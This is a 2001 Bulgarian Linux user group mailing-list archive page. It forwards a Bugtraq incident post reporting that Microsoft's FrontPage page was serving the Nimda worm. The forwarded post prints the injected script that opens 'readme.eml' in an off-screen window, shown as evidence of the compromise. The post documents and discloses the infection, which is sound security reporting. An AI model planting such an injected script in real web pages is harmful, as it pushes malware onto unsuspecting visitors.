Linux-Bulgaria.ORG

навигация

начало

пощенски списък

архив на групата

По Дата

lug-bg: offtopic: FW: Please tell me I'm wrong: microsoft.com infected

Subject: lug-bg: offtopic: FW: Please tell me I'm wrong: microsoft.com infected
From: bkrosnov@xxxxxxxx (Boyan Krosnov)
Date: Thu, 20 Sep 2001 01:28:08 +0300



microsoft.com e infectiran ot Nimda virusa. ima sluhowe syshto za
dell.com

Az si umirqh da se tyrkalqm po poda ot smqh kato go razbrah.

Leka wecher na wsichki.

BR,
Boyan

-----Original Message-----
From: Jay D. Dyson [mailto:jdyson@xxxxxxxxxxxxx]
Sent: Thursday, September 20, 2001 1:03 AM
To: Incidents List; Bugtraq
Cc: Steve Cody
Subject: Re: Please tell me I'm wrong: microsoft.com infected

-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 19 Sep 2001, Steve Cody wrote: 

> I just went to http://www.microsoft.com/frontpage, and my Symantec
> Norton Antivirus popped up and denied access to readme.eml. 
> 
> I could not view the source of the loaded page, so I can't verify that
> it is definitely infected. 

        Your worst fears have now been confirmed.

asumata$ telnet www.microsoft.com 80
Trying 207.46.197.100...
Connected to www.microsoft.akadns.net.
Escape character is '^]'.
GET /frontpage/ HTTP/1.0

<snip>

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>

	Microsoft's site has been compromised by Nimda.  There is no
disputing it now.

- -Jay

  (    (
_______
  ))   ))   .--"There's always time for a good cup of coffee"--.
>====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson@xxxxxxxxxxxxx ------<) |    =
|-'
 `--' `--'  `-- What doesn't kill us only makes us stronger. --'
`------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBO6kH9rlDRyqRQ2a9AQESugP8C6RIIUmkcV/e6ifRNqz067ER5PSizDDA
APzdpR1DO1Q9N5lMEtUagEshgDSYiGKUBU+5vesKZ7TWCjad4iuY8ME0oe4yZxjv
acSX3Tqo0b+sQtJ5VF1IYSljqSbZ+EvYYDUUF8PEmQdkyCp2u/J8HX+duykaisvc
5CjLcnLK5U8=
=DIF4
-----END PGP SIGNATURE-----


------------------------------------------------------------------------
----
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

===========================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers)
http://www.linux-bulgaria.org/ Hosted by Internet Group Ltd. - Stara Zagora

Предишно по дата: lug-bg: Hepten offtopic,ama...
Следващо по дата: lug-bg: dealing with nov opasen virus Nimda
Предишно по тема: lug-bg: java ili neznam kvo
Следващо по тема: lug-bg: dealing with nov opasen virus Nimda
Индекс:
- По дата
- По тема

наши приятели

линукс за българи
http://linux-bg.org

FSA-BG
http://fsa-bg.org

OpenFest
http://openfest.org

FreeBSD BG
http://bg-freebsd.org

KDE-BG
http://kde.fsa-bg.org/

Gnome-BG
http://gnome.cult.bg/

проект OpenFMI
http://openfmi.net

NetField Forum
http://netField.ludost.net/forum/

Linux-Bulgaria.ORG